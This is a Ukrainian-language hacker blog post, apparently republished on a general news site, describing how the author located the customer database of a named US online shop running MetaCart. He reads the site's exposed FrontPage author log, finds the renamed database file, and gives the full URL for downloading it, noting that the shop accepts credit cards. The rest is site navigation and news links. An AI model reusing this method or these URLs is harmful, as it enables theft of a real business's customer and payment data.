уразливість metacart

Подорожуючи якось по інету натрапив я на невеликий такий інтернет-магазинчик, що торгує нехитрими цінностями американської демократії.
І виникла у мене думка дізнатися як часто вони проявляють патріотичні почуття, тим більше що, магазин приймає не тільки чеки але і сс.
Полазити по сайту я зрозумів, що магазин-то працює на системі metacart, але стандартні запити типу www.swimamerica.org/metacart/database/metacart.mdb або www.swimamerica.org/metacart/metacart.mdb не діяли.
Видно адмін змінив назву бази. Тоді вирішив я перевірити сайт на наявність дірявих скриптів, серйозних багів не виявилося, зате зустрівся дуже цікавий файл author.log (www.swimamerica.org/_vti_log/author.log - він досі там, де було багато сміття типу:
[18 Jun 2002 12:54:47 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] kjsaabout.htm
[18 Jun 2002 12:55:47 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] babieslearntofloat.htm
[18 Jun 2002 12:56:06 -0600] 66.176.193.110 asca / KJSwimAmerica [put document] babieslearntofloat.htm
[18 Jun 2002 12:56:15 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] toddlerlessons.htm
[18 Jun 2002 12:56:29 -0600] 66.176.193.110 asca / KJSwimAmerica [put document] toddlerlessons.htm
[18 Jun 2002 12:56:40 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] lessons.htm
[18 Jun 2002 12:57:18 -0600] 66.176.193.110 asca / KJSwimAmerica [put document] lessons.htm
[18 Jun 2002 12:57:29 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] semiprivatelessons.htm
Але були і дуже цікаві рядки:
[19 Jun 2002 8:12:41 -0600] 66.176.193.110 asca / [get document] metacart / productsByCategory.asp
[19 Jun 2002 8:16:05 -0600] 66.176.193.110 asca / [get document] metacart / product.asp
[19 Jun 2002 8:32:29 -0600] 66.176.193.110 asca / [put document] metacart / database / mcart2.mdb
В останній як ви вже зрозуміли, вказані директорії і ім'я бази магазину: metacart / database / mcart2.mdb. Адмін видать не особливо гимора з назвою.
Залишилося ввести в браузер повний урл www.swimamerica.org/metacart/database/mcart2.mdb і чекати поки зіллється вся база.
Ось ніби і все.

Твій bug Durito.
_________________
EAT THE RICH!

Сподобалося? Підпишись на RSS новини!
Ви також можете підтримати shram.kiev.ua, тисніть:

Не зайвим буде і твоїм друзям дізнатися цю інформацію, поділися з ними статтею!

Розгорнути / згорнути

Коментарі

Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.

Кредитка безкоштовно з лімітом в 15000 грн.

Всі новини

Як правильно підбирати вино до свого страви Photo 2017-03-08
Як одягатися за віком і не виглядати нерозумно Photo 2017-03-08
Сексуальний варіант «Йди за мною» Photo 2017-03-08
Тарілка здорового харчування Photo 2017-03-08
NASA відкрило вільний доступ до свого програмного забезпечення Photo 2017-03-08
Кейт Мосс, головна красуня покоління, фатальна жінка Photo 2017-03-08
101 Спосіб застосування паракорд Photo 2017-03-05
Все, що Ви хотіли знати про шини. Маркування, типи, сезонність Photo 2017-03-05
Як вибирати якісні натуральні спеції та прянощі Photo 2017-03-04
Емма Уотсон (26 років) роздяглася для березневого Vanity Fair Photo 2017-03-04
Емма Уотсон (Emma Watson) роздяглася для книги Natural Beauty Photo 2017-03-04
Тату із зображенням відомих героїв Photo 2017-03-03
Схема всього муніципального транспорту Києва Photo 2017-02-28
Як часто потрібно займатися сексом відповідно до віку Photo 2017-02-28
Календар рибалки і прогноз клювання мирної / хижої риби на 2017 рік Photo 2017-02-26
Рибальські вузли, як прив'язати гачок, готуємося до літа Photo 2017-02-26
Euthanasia Coaster, проект американських гірок, призначених для страти Photo 2017-02-26
ВЕБ Сторінка може бути доказом у суді Photo 2017-02-26
У такій косплей, ви самі захочете пограти Photo 2017-02-25
Шикарна підбірка дівчат з Японії. Photo 2017-02-25
Паста ГОІ (від ГОІ - Державний оптичний інститут) Photo 2017-02-24
Непотрібні речі, від яких варто швидше позбутися Photo 2017-02-24
Шкідливі щоденні звички, через які виникає здуття живота Photo 2017-02-24
Важелі управління двигунами літака (РУД), хіба мало ... Photo 2017-02-24
Сучасний дизайн Візитною картки Photo 2017-02-23
Коти, художник Володимир Румянцев Photo 2017-02-23
Цікаві факти про фільм Прометей Photo 2017-02-23
Що повідомили на конференції NASA? Photo 2017-02-21
Формат SSL сертифікату, як конвертувати сертифікат в .pem, .cer, .crt, .der, pkcs або pfx Photo 2017-02-21
Види кровотеч і правила першої допомоги які потрібно знати! Photo 2017-02-20
Ранні ознаки діабету, які ви не повинні ігнорувати! Photo 2017-02-20

Як правильно підбирати вино до свого страви Правило «червоне - до м'яса, біле - до риби» діє ... Photo 2017-03-08
Як одягатися за віком і не виглядати нерозумно Ви на скільки років почуваєтеся? Ходіть, мабуть, немов прищавий ... Photo 2017-03-08
Сексуальний варіант «Йди за мною» Кілька років тому російські фотографи Мурад і Наталя Османн створили ... Photo 2017-03-08
Тарілка здорового харчування Гарвардський університет і сучасна наука проводить численні дослідження, щоб оптимізувати ... Photo 2017-03-08
NASA відкрило вільний доступ до свого програмного забезпечення NASA відкрило вільний доступ до каталогу програмного забезпечення 2017-2018. Як ... Photo 2017-03-08
Кейт Мосс, головна красуня покоління, фатальна жінка У кожного покоління є своя головна красуня, фатальна жінка, яка ... Photo 2017-03-08
101 Спосіб застосування паракорд Для більшості людей паракорд знаком як вельми зручне пристосування з ... Photo 2017-03-05
Все, що Ви хотіли знати про шини. Маркування, типи, сезонність Шини є головною сполучною ланкою між автомобілем і дорогою. Від ... Photo 2017-03-05
Як вибирати якісні натуральні спеції та прянощі Як вибирати натуральні спеції та прянощі на ринку або в ... Photo 2017-03-04
Емма Уотсон (26 років) роздяглася для березневого Vanity Fair Емма роздяглася для березневого журналу Vanity Fair, правда, на обкладинці ... Photo 2017-03-04
Емма Уотсон (Emma Watson) роздяглася для книги Natural Beauty Емма вирішила це зробити для книги Natural Beauty! Причому вона ... Photo 2017-03-04
Тату із зображенням відомих героїв Бітанскій художник-татуювальник створює неймовірно реалістичні тату із зображеннями відомих героїв ... Photo 2017-03-03
Схема всього муніципального транспорту Києва На схемі позначені всі автобусні, тролейбусні і трамвайні маршрути, а ... Photo 2017-02-28
Як часто потрібно займатися сексом відповідно до віку Багатьом цікаво знати, займаються вони сексом занадто багато або занадто ... Photo 2017-02-28
Календар рибалки і прогноз клювання мирної / хижої риби на 2017 рік Існують певні фази світила, коли потрібно просто побути на самоті ... Photo 2017-02-26
Рибальські вузли, як прив'язати гачок, готуємося до літа Тип вузла вибирається з урахуванням типу використовуваної волосіні (мононитка або ... Photo 2017-02-26
Euthanasia Coaster, проект американських гірок, призначених для страти Автор визнає, що американські гірки не є оптимальною машиною для ... Photo 2017-02-26
ВЕБ Сторінка може бути доказом у суді Необхідно розуміти, що, наприклад, авторські права порушує не як існуюча ... Photo 2017-02-26
У такій косплей, ви самі захочете пограти Основні прототипи костюмованої гри - персонажі мультфільмів, аніме, відеоігор, фільмів, ... Photo 2017-02-25
Шикарна підбірка дівчат з Японії. Японці (яп. Ніхондзін / ніппондзін, ніхон-міндзоку) - народ, основне (більше 98%) ... Photo 2017-02-25
Паста ГОІ (від ГОІ - Державний оптичний інститут) Паста ГОІ може використовуватися для полірування виробів з самих різних ... Photo 2017-02-24

Коти. Художник Володимир Румянцев. Photo 2017-02-23
«Прометей» - Цікаві Факти Photo 2017-02-23
Бачили Литовських чирлідерши? Варто Побачити! 2017-02-23
Олсен, Елізабет / Elizabeth Olsen Photo 2017-02-23
Вона Сиділа У Вікна, А Він Увійшов В Її Вагон ... Photo 2017-02-23
Фото Котов, Котів, Кошенят Photo 2017-02-23
Як Вміє Бігати Черепаха Photo 2017-02-23
Бенгальська Кішка Розмовляє З кошеням 2017-02-23
Нацбанк ввів В Звернення Нову Монету (Фото) Photo 2017-02-23
Протасов Яр 30 Років Назад Photo 2017-02-23
Фото Тварин Photo 2017-02-23
Трансляція Наса, Що Повідомили На Конференції Nasa Photo 2017-02-23
Щось, Розміром З Юпітер, Мчить «Крізь» Сонце Photo 2017-02-22
Центральні Вулиці Києва перекриють На П'ять Днів Photo 2017-02-20
3 Народних Способу Зробити Піхва Вузьким І Пружним Photo 2017-02-20
Моніка Беллуччі У Журналі Gq Італія, Березень 2017 Photo 2017-02-20
Група «Serebro» У Журналі Maxim, Лютий 2017 Photo 2017-02-20
Що Робити Якщо Вас Затримали Поліцейські - 146 Стаття Піратство Photo 2017-02-20
З'явилася Нова Вільна Ос Photo 2017-02-18
Дерево Під Електронним Мікроскопом Photo 2017-02-18
Ринок Платіжних Карток З 2016 Року Продемонстрував Істотний Зростання Photo 2017-02-18

соціальні

загрузка ...

Ваш IP: 66.102.9.134
Ваша Країна: США
Ваш регіон: California
Ваш Місто: Mountain View

Free 50 UAH for your Monobank card?